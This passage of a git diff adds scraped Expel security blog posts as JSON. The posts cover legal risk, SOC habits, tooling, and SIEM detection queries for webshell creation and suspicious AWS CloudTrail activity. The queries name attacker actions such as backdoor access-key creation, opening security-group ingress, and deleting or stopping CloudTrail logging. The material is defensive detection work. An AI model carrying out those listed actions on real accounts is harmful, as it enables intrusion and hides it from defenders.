end of file diff --git a/four-common-infosec-legal-risks-and-how-to-mitigate-them.json b/four-common-infosec-legal-risks-and-how-to-mitigate-them.json new file mode 100644 index 0000000000000000000000000000000000000000..49c15bc990b0340dfc33c168cce438543fbbcad7 --- /dev/null +++ b/four-common-infosec-legal-risks-and-how-to-mitigate-them.json @@ -0,0 +1,6 @@ +{ + "title": "Four common infosec legal risks and how to mitigate them", + "url": "https://expel.com/blog/four-common-infosec-legal-risks-how-to-mitigate/", + "date": "Apr 24, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Four common infosec legal risks and how to mitigate them Tips \u00b7 4 MIN READ \u00b7 MARC ZWILLINGER AND MARCI ROSEN \u00b7 APR 24, 2019 \u00b7 TAGS: Cloud security / Managed security / Management / Planning / Security Incident Marc Zwillinger and Marci Rozen are attorneys at ZwillGen PLLC and are based in Washington, D.C. They both counsel clients on information security and privacy issues, handle incident response and advise on cross-border data protection. All views expressed in this article are the authors\u2019 personal observations, and should not be attributed to ZwillGen, any of its other attorneys, or any of its clients. With major data breach settlements capturing headlines every few weeks, most executives are well aware that security incidents pose legal and even existential risk to companies. But as regulatory interest in information security grows, companies face an increasingly broad and varied set of risks in this area. Here are four missteps we see happen often that open fast-growing companies up to unnecessary legal risks. The good news? There are some straightforward ways to mitigate these risks. Risk 1: Failing to implement risk-based security controls As companies face increasing pressure to expand and deliver more convenient services, it can be tempting to prioritize speed over security. However, failing to maintain security controls that are appropriate to the risk posed by data can result in significant legal exposure. The EU\u2019s General Data Protection Regulation (GDPR) and a number of state laws allow regulators to bring enforcement actions against companies that fail to maintain \u201creasonable\u201d security controls for personal information. And the new California Consumer Privacy Act (CCPA), which takes effect on January 1, 2020, provides a private right of action to California consumers whose personal information is breached as a result of \u201cunreasonable\u201d security. HOW TO MITIGATE THE RISK Despite the popularity of the term, there is no single definition of \u201creasonable\u201d security, but there is consensus that \u201creasonableness\u201d depends on the risk posed by the data in question. This is why companies should conduct a risk assessment for each type of dataset they maintain and implement risk-based controls, ideally using a recognized framework like the NIST Cybersecurity Framework. Risk 2: Overlooking vendor security Your company\u2019s security is only as good as the security of your vendors that maintain and/or access your data. Vendors are a popular attack vector for the bad guys who are looking for a point of entry into large corporate networks, as the vendors\u2019 security defenses may not be as strong as their clients\u2019. Unfortunately, even if a breach is the result of a vendor\u2019s subpar security, the data owner still bears legal responsibility for issuing breach notifications and providing credit monitoring (unless the contract with vendor says otherwise) and for responding to regulator inquiries. Additionally, proper vendor selection is part of \u201creasonable\u201d security, as described above. HOW TO MITIGATE THE RISK Require your vendors to sign a robust information security addendum or provide other proof of a mature information security program, like a third-party audit report (e.g., SOC 2 or ISO 27001). In addition, your vendors should be required to notify data owners as soon as possible following a breach that affects the owner\u2019s data. Ideally, your contract should also require the vendor to reimburse any costs associated with responding to such a breach, but many vendors will push back against these kinds of requirements. Risk 3: Not documenting security practices \u2013 or failing to put your policies into practice Even a company with state-of-the-art security practices faces risks if those practices aren\u2019t documented in policies that are regularly reviewed and updated. Not only are information security policies required under various laws, including Massachusetts\u2019 data security law and the New York Department of Financial Services cybersecurity regulations , but they\u2019re also essential for IPO readiness. Conversely, it\u2019s equally risky to establish policies that your company doesn\u2019t follow, or to make unsupported security claims to potential customers. This opens your company up to allegations of deception. Companies considering going public must be prepared to disclose material cybersecurity risks in registration statements, and you should expect the underwriters conducting diligence to request copies of information security policies. HOW TO MITIGATE THE RISK If your organization hasn\u2019t implemented information security policies, you need to document what practices are currently in place, and consult with outside counsel or an independent security assessor to determine whether you need to make improvements to comply with applicable law or industry standards. If your company already adopted information security policies, make sure they\u2019re regularly reviewed by management and updated to reflect current practices. Risk 4: Sidelining your legal team during incident response As the team with technical expertise and first-hand knowledge of the facts of a security incident, it\u2019s natural and appropriate for information security personnel to play a leading role when a security incident happens. However, with incidents that pose legal risk, legal teams (either in-house or external or both) play an equally critical role. When legal teams direct and coordinate response efforts with the IT folks, your company will have the ability to claim privilege over communications and work product \u2013 including the draft forensic reports if your providers are engaged under privilege. If you\u2019re successful, these claims can protect interim, incomplete conclusions and other sensitive information from disclosure during litigation and some types of regulatory investigations. You\u2019ll also want to involve your legal team to assess breach notification obligations and identify other areas of risk exposure throughout the incident response process. HOW TO MITIGATE THE RISK Make sure your company has incident response plans that designate internal or external counsel as being responsible for directing incident response efforts and engaging all third-party vendors. Using outside counsel that specializes in incident response has the added benefit of bolstering privilege claims and lending additional expertise. While there will always be unique legal risks associated with information security, the good news is that with some advanced planning you can mitigate these and better protect your company, its data and the customers you serve." +} \ No newline at end of file diff --git a/four-habits-of-highly-effective-security-teams.json b/four-habits-of-highly-effective-security-teams.json new file mode 100644 index 0000000000000000000000000000000000000000..e980d822d34a8faab12359ceb7db80fa09bc28c8 --- /dev/null +++ b/four-habits-of-highly-effective-security-teams.json @@ -0,0 +1,6 @@ +{ + "title": "Four habits of highly effective security teams", + "url": "https://expel.com/blog/four-habits-highly-effective-security-teams/", + "date": "May 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Four habits of highly effective security teams Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAY 6, 2019 \u00b7 TAGS: Employee retention / Managed security / Management / Planning / SOC No matter if your security team is big or small, I bet you feel understaffed to deliver on your mission. And if your \u201cteam\u201d is just you then you should multiply those feelings by 10x. You\u2019re not alone. In the absence of having the people and budget to snag all of the products on your wish list \u2014 or the people to help shrink your to-do list \u2014 how can you behave like a team twice your size and focus on the stuff that\u2019ll make the biggest impact? Here at Expel, we\u2019re fortunate to have a bunch of people who\u2019ve been managing teams and building security operations centers (SOCs) for eons. Looking back at our collective experience, we identified four consistent habits that all the highly effective security teams we\u2019ve been a part of have practiced. Here\u2019s what we observed and why it all matters, whether you\u2019re a security team of one or 100. 1. They understand what their products do When it comes to security tech, highly effective security teams focus on two things: 1) The alert signal each vendor\u2019s technology produces and 2) What questions they ask of their technology during an investigation. We work with more than two dozen different products here at Expel. We\u2019ve taken the time to generalize the various capabilities that an EDR, Network or SIEM vendor can offer an analyst. We think about the capabilities offered by each class of technology as a capability model. It doesn\u2019t matter how EDR vendor A or vendor B acquire files; our analysts know that vendor A and B offer an acquire file capability and they use Expel Workbench to fetch that file from either vendor. In short, creating a capability model is a good way for us to develop a structured understanding of the questions we can \u201cask\u201d our technology. 2. They take a common approach to investigating When something goes sideways and it\u2019s time to take action, highly effective security teams have a consistent approach to how they run an investigation. It\u2019s important that investigations follow a defined, repeatable process where analysts take the same actions for the same type of alert every time that alert pops up. For example, when our SOC analysts see an alert for a suspicious login, they know their first step in the investigation is to grab historical data for that user to determine what constitutes \u201cnormal\u201d activity. Note that I said \u201cprocess\u201d \u2014 not \u201cprescription.\u201d Yes, you need a standard approach to taking action, but analysts still need to exercise good judgement and make quick decisions. There will always be alerts that turn your usual playbook on its head, which is why ongoing learning and training is so important. 3. They invest in training In my experience, the best security teams make training a priority. So once you\u2019ve got a grip on what your product(s) do and have your investigative process down, you need to get real hands-on practice \u2014 over and over again. One of our favorite ways to keep our analysts sharp is to run threat emulation exercises. Threat emulation is the process of simulating a realistic threat you\u2019re likely to encounter with a heavy emphasis on what happens after an attacker breaks in. It\u2019s the best way to flex those response muscles and improve your team\u2019s collective detection skills. If you want to create your own threat emulation exercise, we\u2019ve got step-by-step instructions right here. We\u2019ve also got some pro tips on how to build a cloud-focused threat emulation exercise in AWS. 4. They demonstrate value to their \u201ccustomers\u201d Finally, highly effective security teams demonstrate value to their customers. A great way of demonstrating value is to figure out how to show your work. Note that showing your work is not bringing an incident report to a board meeting. It\u2019s important to figure out what your customers want to understand about security and then adjust what and how you\u2019re presenting to make sure you\u2019re aligning with their business objectives. And when I say \u201ccustomers\u201d I\u2019m not just talking about the companies that pay you for services. These customers could be your CISO, CEO or a board member. If you\u2019re sitting there thinking that building all of these habits into your team\u2019s culture feels overwhelming, I get it. In that case, start small \u2014 pick one of the four habits and focus on getting your team to execute on that. For example, maybe you have a retention issue because the work isn\u2019t interesting or analysts feel like they aren\u2019t learning. So focus on finding more training opportunities for analysts to flex their detection muscles and have fun doing what they love. Find little ways to keep your security nerds happy and you\u2019ll have an engaged, talented and all-around awesome team." +} \ No newline at end of file diff --git a/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json b/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json new file mode 100644 index 0000000000000000000000000000000000000000..3cef25bd226e633d317d1ae9ed1cf5927c07adb1 --- /dev/null +++ b/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json @@ -0,0 +1,6 @@ +{ + "title": "From webshell weak signals to meaningful alert in four steps", + "url": "https://expel.com/blog/webshell-weak-signals-meaningful-alert-four-steps/", + "date": "Sep 19, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG From webshell weak signals to meaningful alert in four steps Tips \u00b7 7 MIN READ \u00b7 BEN BRIGIDA \u00b7 SEP 19, 2017 \u00b7 TAGS: Example / Get technical / How to / Tear sheet Over the past decade, security products have matured from delivering tactical detections to expanding visibility across an enterprise. While seeing more events can lead to empowering discoveries, turning the volume of events into useful investigative leads has been primarily left to the security one-percenters . In this post we\u2019ll show you a practical example of how you can make a weak signal actionable by combining events from your endpoint and network security technologies into one meaningful alert. Specifically, we\u2019ll walk through how you can create actionable detections for webshell activity. We\u2019ll use Sumo Logic as our SIEM; Palo Alto Networks firewall as our network security device ; and the following endpoint detection and response (EDR) solutions: Tanium or Carbon Black Step 0x00. Weak signals A weak signal is an event that doesn\u2019t contain enough context for you to easily determine the next investigative step. These types of alerts need an analyst to spend a lot of time validating them, and they tend to have a low true-positive rate. In most cases, these alerts are the first to be overlooked or pushed to the bottom of the queue for analyst review. Weak signals can take many different forms, depending on what security devices are deployed. For an endpoint product, weak signals often include: A file or registry modification on a host A module load by a process On the network side, these alerts can take the shape of: Outbound web traffic from users Inbound HTTP traffic to a web server Scanning and exploit attempts from the Internet On their own, any of these alerts \u2014 without additional context or analysis \u2014 are often useless and can be overwhelming. But what happens when you correlate some of these time-intensive alerts to tell a more comprehensive story? Let\u2019s take a peek at how this can benefit your organization with our webshell example. Step 0x01. Know what you\u2019re looking for (aka webshells 101) (Skip to Step 0x02 if you\u2019re familiar with webshells and already tell China Chopper jokes) Webshells often serve as an initial foothold that attackers can use to compromise your internal network. They give an attacker access to a shell on a server in a victim\u2019s environment via a web browser. To create one, an attacker compromises a web server or web-accessible directory. The attacker will drop a script (or modify an existing page) which allows them to issue remote commands to the compromised system. The scripts can be as small as a few bytes, and they exist in many language flavors (ASP, ASPX, CFM, JSP, and PHP, to name a few). Some contain additional features that help attackers perform reconnaissance, such as file browsers or scanning modules. Webshells are primarily delivered through web application exploits or insecure practices, including: Web administrative interfaces with default or weak credentials Sites that allow arbitrary file uploads Web servers with remote file inclusion, SQL or cross-site scripting (XSS) vulnerabilities Content management system (CMS) vulnerabilities Step 0x02. Alerts in Palo Alto Networks Network vendors like Palo Alto Networks dedicate resources to researching vulnerabilities and developing rules that signal when someone attempts to use an exploit. However, external vulnerability scanning is now part of the normal white noise of the internet. Rarely does an attempted exploit mean that you were actually compromised. So you have to do more work to answer the question, \u201cWas the system compromised?\u201d To answer that question, an analyst has to search for related network alerts from the target system. If a payload delivered to the system is detected, or the command-and-control (C2) method is known (via URL categorization or based on the contents of the packets), the analyst can determine that the exploit succeeded. Keep in mind that absence of evidence is not evidence of absence. Attackers often use payloads or C2 methods to avoid these types of network detection. For example, passive backdoors like webshells won\u2019t generate traffic until the attacker chooses to interact with the resource. In this case, if the attacker used a vulnerability to drop a webshell, we wouldn\u2019t necessarily have network evidence indicating the host was compromised. That\u2019s why, in and of themselves, vulnerability alerts can be difficult to action. But\u2026 there is hope. Here\u2019s why. Even if we don\u2019t have any related network alerts to analyze, we can build actionable alerts by combining network alerts for vulnerability attempts with relevant endpoint events, such as file modifications. By correlating these alerts you can quickly reduce the flood of vulnerability alerts and focus on the events where the vulnerability exploitation may have been successful. First, we need to find all the exploit attempts. We\u2019ll collect all the Palo Alto Network activity from hosts that generated an alert in the \u201cVulnerability\u201d threat category . To accomplish this, we\u2019ve configured Palo Alto Networks to forward \u201cVulnerability\u201d alerts to Sumo Logic . Once you\u2019ve done that, you can move on to step 0x03. Step 0x03. Hi ho, hi ho, it\u2019s off to the endpoint we go Now that we know everywhere there could be a webshell, it\u2019s time to combine the weak signals together. To do that, we need to correlate the network alerts with any servers that have had script file modifications in a web-accessible directory within 15 minutes of the alert. There are several ways to make the correlation. We\u2019ll illustrate how you can do it with two of the most common endpoint detection and response tools. Here are some specific examples of queries you can perform with an endpoint security product to capture webshell activity. Keep in mind that these queries are not comprehensive lists of web accessible locations. They\u2019re just some ideas to get you off on the right foot. Carbon Black Response Carbon Black Response tracks network connections, module loads, remote threads, and file modifications on every endpoint where it\u2019s deployed. You can query particular events within processes using a feature that Carbon Black calls \u201c Watchlists \u201d. The watchlists allow you to save queries, so Carbon Black can inform you whenever a process or binary matches certain event criteria. By creating a watchlist for file modifications in web-accessible directories, we can develop a weak signal to inform our security team when something resembling a webshell is created. An example of a query for webshell creation with Carbon Black might look something like: (filemod:wwwroot* or filemod:htdocs*) and (filemod:.aspx or filemod:.jsp or filemod:.cfm or filemod:.asp or filemod:.php) AND host_type:\"server\" The data is sent to Sumo Logic by configuring the Carbon Black event forwarder . In our lab, we deployed the Event Forwarder on the Carbon Black Response Appliance and sent the output as JSON to a Sumo Logic HTTP Source . Tanium The Tanium Trace module uses a local datastore to record process events, network connections and file modifications on each endpoint where Trace is deployed. You query it by asking questions through the Tanium Console. Saved Questions are queries that are saved and recur on a predetermined basis. By using the Tanium \u201cTrace File Operations\u201d sensor to query for any new files created in web-accessible directories we can identify webshell-like activity. An example of a saved question for webshell creation with Tanium is: Get Trace File Operations[1 hour,, 1, 0, 10, 0, (?i).*(wwwroot|htdocs).*.(aspx|jsp|cfm|asp|php), , , , ] and IPv4 Address and Operating System from all machines with Operating System containing \"server\" The data is sent to Sumo Logic by configuring the Tanium Connect module to send the results of the saved question as JSON to a Sumo Logic HTTP Source. Step 0x04. Correlation The final step is to combine the weak signal alerts from the network device and the alert from the endpoint. To correlate these alerts we\u2019ve used Sumo Logic as our SIEM. Please note the following about the queries we\u2019re providing: These queries are intended to work across Sumo Logic regardless of whether field extraction rules are set up. You shoulds use field extraction on ingestion; an example of this for Palo Alto Networks can be found here . The timewindow operator ensures we only join events that occurred within a 15-minute window of each other. This window of time may work for you, or you may need to tweak it depending on endpoint timestamps, clock skew, or other factors. We configured logs to be sent to Sumo Logic in the following format: Palo Alto Networks \u2013 CSV Carbon Black \u2013 JSON Tanium \u2013 JSON The query also assumes you\u2019ve sent this data to Sumo Logic in the above formats. Our query using Tanium and Palo Alto Networks is: \"Expel - Potential Webshell Write\" OR \"vulnerability\" | join (json auto keys \"Expel - Potential Webshell Write.IPv4 Address\", \"Expel - Potential Webshell Write.Process Path\", \"Expel - Potential Webshell Write.File Path\", \"Expel - Potential Webshell Write.QuestionName\", \"Expel - Potential Webshell Write.Endpoint Name\" as interface_ip, process_path, file_path, question_name, host_name) as tn, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on tn.interface_ip = panw.dst_ip timewindow 15m | fields tn_interface_ip, tn_host_name, tn_process_path, tn_file_path, panw_threat_id, tn_question_name, panw_gen_time Our query using Carbon Black and Palo Alto Networks is: \"alert.watchlist.hit.query.process\" OR \"vulnerability\" | join (json auto keys \"interface_ip\",\"process_path\",\"ioc_attr\",\"watchlist_name\",\"computer_name\",\"created_time\", \"ioc_attr\" as interface_ip, process_path, ioc_match, watchlist_name, host_name, created_time, ioc_attr) as cb, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on cb.interface_ip = panw.dst_ip timewindow 15m | fields cb_interface_ip, cb_host_name, cb_process_path, cb_ioc_attr, panw_threat_id, cb_watchlist_name, panw_gen_time, cb_created_time \u2014 If you\u2019re interested in taking action on what was discussed in this post, below is a tearsheet with all the queries discussed to put this correlation into practice. Executable Actions Carbon Black Watchlist (filemod:wwwroot* or filemod:htdocs*) and (filemod:.aspx or filemod:.jsp or filemod:.cfm or filemod:.asp or filemod:.php) AND host_type:\"server\" Tanium Question Get Trace File Operations[1 hour,, 1, 0, 10, 0, (?i).*(wwwroot|htdocs).*.(aspx|jsp|cfm|asp|php), , , , ] and IPv4 Address and Operating System from all machines with Operating System containing \"server\" Sumo Logic Query Carbon Black \"alert.watchlist.hit.query.process\" OR \"vulnerability\" | join (json auto keys \"interface_ip\",\"process_path\",\"ioc_attr\",\"watchlist_name\",\"computer_name\",\"created_time\", \"ioc_attr\" as interface_ip, process_path, ioc_match, watchlist_name, host_name, created_time, ioc_attr) as cb, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on cb.interface_ip = panw.dst_ip timewindow 15m | fields cb_interface_ip, cb_host_name, cb_process_path, cb_ioc_attr, panw_threat_id, cb_watchlist_name, panw_gen_time, cb_created_time Sumo Logic Query Tanium \"Expel - Potential Webshell Write\" OR \"vulnerability\" | join (json auto keys \"Expel - Potential Webshell Write.IPv4 Address\", \"Expel - Potential Webshell Write.Process Path\", \"Expel - Potential Webshell Write.File Path\", \"Expel - Potential Webshell Write.QuestionName\", \"Expel - Potential Webshell Write.Endpoint Name\" as interface_ip, process_path, file_path, question_name, host_name) as tn, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on tn.interface_ip = panw.dst_ip timewindow 15m | fields tn_interface_ip, tn_host_name, tn_process_path, tn_file_path, panw_threat_id, tn_question_name, panw_gen_time Happy Hunting!" +} \ No newline at end of file diff --git a/generate-security-signals-with-sumo-logic-aws-cloudtrail.json b/generate-security-signals-with-sumo-logic-aws-cloudtrail.json new file mode 100644 index 0000000000000000000000000000000000000000..93378f852d4db4c1c63d53939366b30a5d31637b --- /dev/null +++ b/generate-security-signals-with-sumo-logic-aws-cloudtrail.json @@ -0,0 +1,6 @@ +{ + "title": "Generate Security Signals with Sumo Logic & AWS Cloudtrail", + "url": "https://expel.com/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/", + "date": "Sep 10, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Generate Strong Security Signals with Sumo Logic & AWS Cloudtrail Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN \u00b7 SEP 10, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC As orgs increasingly shift some of their workloads to cloud providers like Amazon Web Services (AWS), it\u2019s often challenging to get the right level of visibility into these new environments for security monitoring purposes. Sure, security professionals have had decades of experience monitoring traditional enterprise networks, but services like AWS, Microsoft Azure and Google Cloud Platform come with additional sources of valuable data \u2014 which is frustratingly unfamiliar if you\u2019re used to racking and stacking your own servers. Combine that uncertainty with an already long laundry list and the result is this: Most organizations using cloud platforms are not taking full advantage of the signals available to them. But there\u2019s some good news: There are lots of great technology solutions we can use to help us get a better handle on those signals. In this post, I\u2019ll show you how Expel uses a SIEM (in this example, we\u2019ll take a look at Sumo Logic ) to generate security leads from AWS signals. Regardless of what SIEM you use, I\u2019ll share some detection use cases (with examples!) that you can try out in your own environment. How does a SIEM help? Anyone who works in security knows that there are two high-level problems that need to be solved to effectively monitor an environment: Collecting the data you need; and Drawing actionable insights from the data A log management (aka SIEM) solution like Sumo Logic does all of the heavy lifting, connecting up to your sources of data and providing an intuitive search interface that lets you generate alerts and perform investigations. For example, you can easily onboard Amazon CloudTrail data from AWS with the built-in connector (more on CloudTrail in a moment). In a few easy steps, you can create a trail and get data flowing by granting Sumo Logic access to the S3 bucket containing the logs. This can be done right in the AWS console with a few button clicks or via the CloudTrail API and takes about five minutes. Once you\u2019ve hooked up Sumo Logic, you can validate data flow by issuing queries against the CloudTrail data like so: Now that you\u2019ve got data flowing, the next step is making sense of it. Building a detection strategy for Amazon CloudTrail Why Amazon CloudTrail is useful If you aren\u2019t familiar with Amazon CloudTrail, think of it as an audit log of all AWS activities that happen in your account. By default, AWS enables a default CloudTrail for every account \u2014 it records the most essential events and retains them for 90 days. This is helpful as a default, but as a best practice it\u2019s important to create your own CloudTrail that sends events to a S3 bucket of your choosing. This allows you to control the granularity of the events that get logged and the length of time those logs are retained. You can also use AWS Organizations to enforce a global CloudTrail that sends audit data from all of your AWS accounts (including all regions) to one master S3 bucket. This ensures that you never end up in a situation where you\u2019re missing audit data needed for a compliance requirement (or \u2014 oh noes! \u2014 an active security investigation). Making sense of CloudTrail data Getting data flowing is relatively easy, but making sense of it all can be overwhelming (especially if it\u2019s the first time you\u2019re working with it). At Expel, we maintain a detection and response strategy for AWS that defines what signals we look for and how our team responds. To build a detection strategy, we consider the attack lifecycle and make sure we have layered signals in place to detect attacker or risky behaviors. We think about signal in terms of these three categories, which helps us identify areas of risk and brainstorm detection use cases. Access (how does someone enter the environment), Movement (how does data move around), and Storage (where does data live). Below are a few examples that show what some of these use cases look like: Brainstorming at a high level where your areas of risk are and what compensating controls (including detection use cases) you have in place is a healthy exercise that orgs should do routinely (We do this!). Generating valuable AWS signals Now I\u2019ll move on to the fun part. Let\u2019s dig into a few examples of CloudTrail-based signals that we\u2019ve found valuable that might be helpful to you and your team (if you\u2019re lucky enough to have one) as well. Suspicious logins Credential theft isn\u2019t a new attack vector by any means, but it\u2019s still an issue for orgs of all shapes and sizes. Particularly as orgs start to use AWS, managing developer credentials gets challenging. As a result, a compromise of a developer workstation can quickly lead to a greater compromise of an AWS environment if you don\u2019t have the right controls and signals in place. So how can you use CloudTrail logs to help zero in on this problem? Check out the query below as a starting point: _sourceCategory = {{sourceCategory}} | parse regex \"(?{.*)\" | json field=raw \"eventName\", \"sourceIPAddress\", \"userAgent\", \"userIdentity.type\", \"userIdentity.arn\", \"userIdentity.userName\", \"additionalEventData.MFAUsed\" as event_name, src_ip, user_agent, user_type, user_arn, user_name, mfa nodrop | lookup country_code from geo://location on ip = src_ip | where event_name = \"ConsoleLogin\" and mfa != \"Yes\" and country_code not in (\"US\") | count by country_code, mfa, user_type, user_arn, src_ip, user_agent What we\u2019re looking for: AWS console logins where MFA wasn\u2019t used Unusual geo-location for the source IP address (customizable for your org) Tips and tricks: Consider time of day/day of week as a condition. Should anyone be logging in on the weekend? Account discovery Let\u2019s assume that an attacker gets authenticated access to an environment. What happens next? In our experience, an attacker usually starts to enumerate the AWS account, listing IAM Users, Groups and Roles, and generally poking around the account to understand it. One common side effect is a burst in API failures as the attacker may not have the necessary permissions to green light all of their attempted actions. Using this as a hypothesis, let\u2019s build a signal to alert when this happens: _sourceCategory = {{sourceCategory}} | parse regex \"(?{.*)\" | json field=raw \"eventName\", \"errorCode\", \"errorMessage\", \"sourceIPAddress\", \"userIdentity.userName\", \"userIdentity.type\", \"eventSource\" as event_name, error_code, error_msg, src_ip, user_name, user_type, event_source nodrop | where error_code = \"AccessDenied\" | timeslice 1h | count as failures, count_distinct(event_name) as methods, count_distinct(event_source) as sources by _timeslice, user_type, user_name, event_source, error_msg, src_ip | where failures > 5 and methods > 1 and sources > 1 What we\u2019re looking for: A burst in AccessDenied errors over a period of one hour Multiple unique failed API calls Multiple unique AWS services generating failures Tips and tricks: You may find some noisy service accounts when first implementing this signal. This is a good opportunity to fix any broken policy documents or exclude specific accounts that you expect to generate failures. Maintaining access If an attacker gains an initial foothold in an environment, the attack\u2019s next objective is to figure out a way to maintain that access. In a traditional enterprise, that might look like installing a service, setting up a scheduled task or creating a backdoor user account. What does this look like in AWS? It turns out there are some parallels \u2013 Rhino Security Labs has done a great job with Pacu, an open-source AWS exploitation toolkit (think Metasploit for AWS) that illustrates some of these behaviors. As an example, AWS Lambda can be used as a persistence mechanism: _sourceCategory = {{sourceCategory}} | parse regex \"(?{.*)\" | json field=raw \"eventName\", \"userIdentity.invokedBy\" as event_name, invoked_by nodrop | where invoked_by = \"lambda.amazonaws.com\" and event_name in (\"CreateAccessKey\", \"AuthorizeSecurityGroupIngress\", \"UpdateAssumeRolePolicy\") What we\u2019re looking for: A lambda function executing a suspicious action by: Creating an access key to backdoor an IAM user Updating a security group to allow ingress on a port Updating an assume role policy to allow external access Tips and tricks: Implement least privilege to prevent these persistence mechanisms. Don\u2019t grant users access to services they don\u2019t need. Evading defenses As a final example, determined attackers attempt to evade detection. Since CloudTrail logs nearly everything an attacker might want to do in an environment, CloudTrail is also an attack target. If an attacker has the right permissions, he or she can stop and/or delete a CloudTrail, making it more difficult for an organization to identify threats and respond. You can identify this activity by looking for the following API calls: _sourceCategory = {{sourceCategory}} | parse regex \"(?{.*)\" | json field=raw \"eventName\", \"sourceIPAddress\", \"userIdentity.arn\", \"userIdentity.type\", \"eventSource\" as event_name, src_ip, user_arn, user_type, event_source nodrop | where event_name in (\"DeleteTrail\", \"StopLogging\", \"DeleteLogGroup\", \"DeleteLogStream\", \"DeleteDestination\") What we\u2019re looking for: An attacker deleting audit data by: Stopping or deleting a CloudTrail Deleting a log group or stream from CloudWatch Deleting a CloudWatch destination Tips and tricks: Using AWS Organization trails are a huge help here. An attacker can\u2019t stop or delete a trail that is enforced by the master account. He or she also can\u2019t disable the default EventHistory trail that exists for each AWS account. Bringing it all together Getting all of this set up is a large step forward if you\u2019re just getting started with AWS monitoring, but I\u2019d be remiss if I didn\u2019t mention one last piece of this puzzle: operationalizing these alerts. All of this work would go to waste without a well thought-out process for alert triage and investigation (we\u2019ll dive deeper into that topic in a future blog post). Generating alerts is great, but you\u2019ve got to make sure they\u2019re getting in front of the right people. Sumo Logic (and most SIEM technologies) have multiple options including dashboards, in-console workflows and other ways to send notifications to external services via email or webhooks. You may decide, for example, that you\u2019d like to send a Slack message to a team of developers for activity that occurs in your development account. Alternatively, if you and/or your team is bogged down already with a million other to-dos and you simply don\u2019t have the bandwidth to develop and respond to alerts, consider working with a third party. Yes, we\u2019re biased, but we\u2019d love to chat if you think we might be able to help. Getting a handle on your cloud infrastructure isn\u2019t always easy. Collecting and making use of audit data that these platforms generate \u2014 like AWS CloudTrail \u2014 is an important part of that mission and a good place to start." +} \ No newline at end of file diff --git a/get-your-security-tools-in-order-seven-tactics-you-should.json b/get-your-security-tools-in-order-seven-tactics-you-should.json new file mode 100644 index 0000000000000000000000000000000000000000..86c4521aeb22b08247749b20457a300dac9454ff --- /dev/null +++ b/get-your-security-tools-in-order-seven-tactics-you-should.json @@ -0,0 +1,6 @@ +{ + "title": "Get your security tools in order: seven tactics you should ...", + "url": "https://expel.com/blog/get-security-tools-order-seven-tactics-know/", + "date": "Sep 7, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Get your security tools in order: seven tactics you should know Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 7, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management / Selecting tech / Tools At the tail end of the last century (doesn\u2019t that sound a lot longer ago than 17 years?), the Gallup organization surveyed 80,000 managers over the course of 25 years. Their goal was to understand what truly exceptional managers do differently to drive performance\u2026 and to create great places to work. Many of you are probably familiar with the book summarizing the results by Marcus Buckingham and Curt Coffman called \u201c First, Break All The Rules .\u201d I\u2019ll spare you the entire book summary and draw your attention to one particular bit. Their research pointed to twelve questions, which, when answered affirmatively, correlate to a high-performance work environment. And one of those questions (in fact it was #2 on the list) was the following: Do I have the equipment and material I need to do my work right? Well now, that seems pretty straightforward. Of course you\u2019d want your people to have the right tools for the job. Who wouldn\u2019t do that? Turns out, almost everyone. Security operations centers (SOCs) are rife with inadequate, poorly integrated, dated technology that seems to frustrate security practitioners even if it\u2019s functional most of the time. Is there a SIEM sitting around whose care and feeding stopped a few years ago and seems to deliver little but false positives anymore? Did you pick an endpoint detection and response (EDR) solution that truly was \u201c the new hotness \u201d three years ago only now to discover that there\u2019s another \u201c new new hotness \u201d in town? Or my current favorite: state of the art network packet capture devices monitoring links that have no visibility into sensitive data moving between third-party cloud providers. If you\u2019ve hired well, these problems give rise to something interesting: intrepid security analysts spinning Python to work around limitations of existing technology and streamlining what they can. Does this help? Amazingly, it sure does. Being close to the problems and the associated technology means your analysts have unique insight into how to make their lives better. Go figure. The drawback? They\u2019re not software engineers. The solutions are brittle and difficult to maintain across churn. Are we at an impasse then? Are we destined to be working with sub-optimal technology that does little more than confound us and get in our way? Well, yes and no. Here are seven things to keep in mind to bring harmony to your toolchain. 1. There are no perfect tools Regardless of what you end up buying to solve your [insert security capability here] gap, the tool you choose will fall short in some way. Optimize for the capabilities that are most important to you and fill the gap another way. 2. Your imperfect tools need care and feeding Negligence degrades your tools\u2019 performance. Maintaining operational rigor around maintenance is important, as is throwing out old tools when they\u2019ve passed their prime. 3. Track capabilities Whether you\u2019re talking about detection capability on the network, investigation capability on the endpoint, or vice-versa, keep an inventory of what tools are allegedly solving which problems. Avoid buying new tools just because it\u2019s fun. 4. Evaluate visibility Beyond the capabilities your tools provide, each has a certain scope. Your EDR solution\u2019s visibility is governed by where agents are installed. Your packet sniffers can only see the links they\u2019re plugged into. Your security analysts are already in an unfair fight: make sure they\u2019re not fighting with blinders on. 5. Measure efficacy You have assumptions when you buy new security products. Do your detectors detect with a good signal-to-noise ratio? Are your investigative tools used frequently? Track not only frequency of use, but how you\u2019re getting faster over time. 6. Integrate Using imperfect tools is bad enough, hopping between frustrating consoles is worse. Encourage your security analysts to build software (ok, ok, write code) to mitigate alt-tab-copy-paste-death. To really turn it up to 11 , invest in professional SOC plumbers (experienced software engineers) who understand the operational realities. 7. \u201cEquipment and material\u201d is more than tools While we\u2019ve focused heavily on tool choice in this post, operationalizing your tools is actually more important than their selection. Part of that is documentation. Playbooks. Without these, getting value out of your security investments depends on tribal knowledge, which is easily lost. \u2014 There are always clever new variations on old themes when it comes to security risks. Heck, some variations aren\u2019t even that clever or that new \u2026 but manage to ruin your day 